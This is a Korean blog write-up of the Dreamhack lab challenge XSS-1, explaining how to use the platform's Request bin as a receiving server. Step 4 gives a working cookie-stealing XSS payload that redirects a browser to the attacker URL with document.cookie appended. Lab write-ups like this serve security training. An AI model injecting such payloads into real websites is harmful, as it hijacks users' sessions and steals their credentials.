dreamhack 웹해킹 - 3(XSS-1)

안녕하세요. dreamhack - webhacking - stage 4의 함께 실습 부분 문제 XSS-1을 풀어볼까합니다. 이걸 남기는 이유는 dreamhack의 여러가지 기능이 있다보니 그 기능을 사용하는 방법에대해 중점에 두고 설명을 해볼까합니다. 자세한 풀이의 경우에는 강의에 있으니 그걸 보고 이해해주시면 감사하겠습니다.

 

1. xss-1 문제의 접속 경로를 통해 실습 서버로 들어가줍니다.

2. dreamhack tools에서 Request bin 부분으로 가서 링크 생성을 눌러줍니다. 

링크 생성으로 만든 https://qrrqrwy.request.dreamhack.games 이것은 공격자의 서버가 될 것 입니다. 

 

3. xss-1 실습 서버에서 flag 경로로 들어가줍니다.

4. 빈란에 <script>location.href = "공격자의 URL/?memo=" + document.cookie;</script> 을 입력해줍니다. 저의 경우에는 <script>location.href = "https://qrrqrwy.request.dreamhack.games/?memo=" + document.cookie;</script> 이렇게 될 것입니다.

5. 제출버튼을 눌러줍니다.

6. good이 뜬다면 서버쪽의 selenium이 공격자 서버쪽으로 쿠키를 보내줄 것입니다. 공격자의 서버는 dreamhack tools로 생성했으니 한번 봐봅시다.

Querystring 부분에 flag 정답이 있는 것을 확인할 수 있습니다.